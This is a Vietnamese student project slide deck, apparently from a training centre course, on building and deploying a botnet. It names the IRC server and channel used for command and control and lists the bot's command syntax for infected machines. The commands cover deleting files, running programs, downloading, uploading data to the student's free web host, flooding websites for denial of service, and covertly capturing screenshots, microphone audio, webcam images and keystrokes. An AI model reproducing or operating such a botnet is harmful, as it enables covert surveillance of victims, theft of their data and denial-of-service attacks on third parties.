15
ĐỒ ÁN “XÂY DỰNG VÀ TRIỂN KHAI MẠNG BOTNET” Giảng viên hướng dẫn : Võ Đỗ Thắng Sinh viên thực hiện : Hoàng Xuân Nhật Huy

Đồ án cuối kì

Embed Size (px)

DESCRIPTION

trung tâm Athena

Citation preview

Page 1: Đồ án cuối kì

ĐỒ ÁN “XÂY DỰNG VÀ TRIỂN KHAI MẠNG BOTNET”

Giảng viên hướng dẫn : Võ Đỗ ThắngSinh viên thực hiện : Hoàng Xuân Nhật Huy

Page 2: Đồ án cuối kì

Giới thiệu về Bot và Botnet :Bot là viết tắt của robot, tức các chương

trình tự động hoá (chứ không phải là người máy như nghĩa chúng ta vẫn gọi) thường xuyên được sử dụng trong thế giới Internet

Botnet là những chương trình cho phép kẻ tấn công sử dụng máy của họ như là những Zoombie và chúng chủ động kết nối với một Server để dễ dàng điều khiển

Page 3: Đồ án cuối kì

I/ Cài đặt công cụ giao tiếp với Botnet

Ở đây chúng ta sử dụng chương trình Xchat

B1: Chọn user là postmodernism

Page 4: Đồ án cuối kì

B2: Chọn “Thêm” và đặt tên cho mạng

Page 5: Đồ án cuối kì

B3 : Chọn “Sửa” , điền tên của máy chủ là irc.quakenet.org

Page 6: Đồ án cuối kì

B4 : Chọn “Đóng” và ra màn hình chính chọn “Kết nối” , ta được cửa sổ như hình dưới , nhập vào từ “rock0em” , đây chính là kênh ta điều khiển botnet

Page 7: Đồ án cuối kì

II/ Tập lệnh của Botnet

Page 8: Đồ án cuối kì

Lệnh checkinfo-Cú pháp : checkinfo@[tên máy bị nhiễm]

Lệnh delete-Cú pháp : delete@[tên máy bị nhiễm]@[đường dẫn tới file cần xóa]

Lệnh run-Cú pháp : run@[tên máy bị nhiễm]@[đường dẫn tới file .exe , .bat]

Page 9: Đồ án cuối kì

Lệnh download-Cú pháp : download@[tên máy bị nhiễm]@[link file cần down]@[địa chỉ lưu lại]

Lệnh upload-Cú pháp : upload@[tên máy bị nhiễm]@[user của host]@[pass của host] @[địa chỉ của file ở máy]@[vị trí muốn lưu lại trên host]-Ở đây em đã đăng kí một host miễn phí là www.dienthoaihanquoc.netau.net , phần địa chỉ này của host được em lưu sẵn trong botnet nên không cần nhập vào

Page 10: Đồ án cuối kì

Lệnh rundos-Cú pháp : rundos@[tên máy bị nhiễm]@[lệnh dos muốn thực hiện]

Lệnh processclose-Cú pháp : processclose@[tên máy bị nhiễm]@[process muốn tắt]

Page 11: Đồ án cuối kì

Lệnh processlist-Cú pháp : processlist@[tên máy bị nhiễm]@[số thứ tự của process đầu tiên của list]@[số thứ tự của process cuối cùng của list]

Lệnh filelist-Cú pháp : filelist@[tên máy bị nhiễm]@[folder muốn kiểm tra]@[số thứ tự của file đầu tiên của folder]@[số thứ tự của file cuối cùng của folder]

Page 12: Đồ án cuối kì

Lệnh flood-Cú pháp : filelist@[tên website muốn tấn công DOS]@[kích thước một gói tin muốn gửi]

Lệnh snapshot-Cú pháp : snapshot@[tên máy bị nhiễm]@[user của host]@[pass của host]@[vị trí lưu file chụp màn hình trên máy bị nhiễm]@[vị trí muốn lưu file chụp màn hình trên host]

Page 13: Đồ án cuối kì

Lệnh soundrecord-Cú pháp : soundrecord@[tên máy bị nhiễm]@[vị trí lưu file ghi âm]@[thời gian ghi âm (giây)]-Sử dụng micro có sẵn của máy tính để thu âm các cuộc nói chuyện

Lệnh commandcam-Cú pháp : commandcam@[tên máy bị nhiễm]-Sử dụng webcam có sẵn của máy tính để chụp hình người sử dụng , vị trí lưu file ảnh mặc định là C:\image.bmp

Page 14: Đồ án cuối kì

Lệnh keylog(1)-Cú pháp : keylog(1)@[tên máy bị nhiễm]-Kích hoạt chức năng keylog , để khóa chức năng này , dùng cú pháp keylog(0)@[tên máy bị nhiễm]-File log được ghi lại dưới dạng file html , mặc định nằm cùng folder với file soldier

Page 15: Đồ án cuối kì

CẢM ƠN THẦY VÀ CÁC BẠN ĐÃ THEO DÕI